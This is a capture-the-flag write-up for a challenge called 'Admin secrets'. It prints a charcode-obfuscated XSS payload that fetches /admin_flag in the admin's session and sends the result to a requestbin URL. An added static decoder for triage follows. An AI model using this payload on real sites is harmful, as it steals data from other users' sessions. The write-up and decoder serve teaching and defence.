Admin secrets

- XSS can be performed by reporting to the admin.
- The admin dashboard has a link to /admin_flag.
- Requesting admin_flag from a page with {, ", ', `, or gives an error.

<img src="0" onerror="eval(String.fromCharCode(118,97,114,32,120,104,116,116,112,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,104,116,116,112,46,111,110,114,101,97,100,121,115,116,97,116,101,99,104,97,110,103,101,61,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,120,104,116,116,112,50,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,105,102,40,116,104,105,115,46,115,116,97,116,117,115,61,61,50,48,48,41,123,120,104,116,116,112,50,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,58,47,47,114,101,113,117,101,115,116,98,105,110,46,110,101,116,47,114,47,49,103,50,117,104,110,55,49,63,111,117,116,61,39,43,101,110,99,111,100,101,85,82,73,40,98,116,111,97,40,116,104,105,115,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,44,116,114,117,101,41,125,101,108,115,101,123,120,104,116,116,112,50,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,58,47,47,114,101,113,117,101,115,116,98,105,110,46,110,101,116,47,114,47,49,103,50,117,104,110,55,49,63,111,117,116,61,39,43,116,104,105,115,46,115,116,97,116,117,115,44,116,114,117,101,41,125,120,104,116,116,112,50,46,115,101,110,100,40,41,125,59,120,104,116,116,112,46,111,112,101,110,40,39,71,69,84,39,44,39,47,97,100,109,105,110,95,102,108,97,103,39,44,116,114,117,101,41,59,120,104,116,116,112,46,115,101,110,100,40,41,59))">

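The payload requests /admin_flag from the admin's session and forwards the response, base64-encoded, to a request bin. If the request does not return 200, it forwards the HTTP status instead.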
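For triage on the receiving side, the following added example (not part of the original writeup) statically decodes `String.fromCharCode` arguments found in inline event handlers of a reported snippet and lists the paths or URLs the hidden script references, without evaluating anything. The names `triageReport`, `decodeCharCodes` and `SAMPLE_REPORT` are hypothetical, and the sample input is constructed.

```javascript
// Added example: static triage of a reported HTML snippet. Nothing is evaluated.
// SAMPLE_REPORT is constructed for this example; it decodes to fetch('/admin_flag').
const SAMPLE_REPORT =
  '<img src="0" onerror="eval(String.fromCharCode(' +
  '102,101,116,99,104,40,39,47,97,100,109,105,110,95,102,108,97,103,39,41))">';

// Inline event-handler attributes such as onerror= or onload=.
const HANDLER_RE = /\bon[a-z]+\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
// String.fromCharCode(...) calls whose arguments are all decimal literals.
const CHARCODE_RE = /String\s*\.\s*fromCharCode\s*\(\s*((?:\d+\s*,\s*)*\d+)\s*\)/g;
// Quoted absolute URLs or site-relative paths inside decoded script text.
const TARGET_RE = /['"`]((?:https?:\/\/|\/)[^'"`]*)['"`]/g;

// Return the plaintext of every all-literal fromCharCode call in a script string.
function decodeCharCodes(script) {
  const decoded = [];
  for (const m of script.matchAll(CHARCODE_RE)) {
    const codes = m[1].split(',').map((n) => Number(n.trim()));
    // Skip values outside the UTF-16 code unit range rather than wrapping them.
    if (codes.every((c) => c <= 0xffff)) decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// One finding per inline handler: its name, whether it calls eval,
// the decoded script text, and the paths/URLs that text references.
function triageReport(html) {
  const findings = [];
  for (const m of html.matchAll(HANDLER_RE)) {
    const handler = m[0].split('=')[0].trim().toLowerCase();
    const body = m[1] ?? m[2];
    const decoded = decodeCharCodes(body);
    const targets = decoded.flatMap((d) => [...d.matchAll(TARGET_RE)].map((t) => t[1]));
    findings.push({ handler, usesEval: /\beval\s*\(/.test(body), decoded, targets });
  }
  return findings;
}

console.log(JSON.stringify(triageReport(SAMPLE_REPORT), null, 2));
```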
